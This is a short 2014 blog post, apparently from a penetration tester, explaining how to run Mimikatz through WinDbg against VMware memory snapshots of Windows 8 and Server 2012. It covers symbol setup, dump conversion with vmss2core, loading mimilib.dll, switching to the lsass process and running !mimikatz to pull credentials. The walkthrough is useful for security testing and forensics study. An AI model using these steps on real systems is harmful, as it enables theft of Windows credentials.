Friday, June 13, 2014

Mimikatz Against Virtual Machine Memory Part 2

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012


First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them:

http://support.microsoft.com/kb/311503

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols


0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........


Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above)

For VMware ESXi i just needed to pass the .vmsn file

The rest follows the same flow as the previous post

1.  Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe


5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................



6. Run Mimikatz

kd> !mimikatz


7. Drink Beers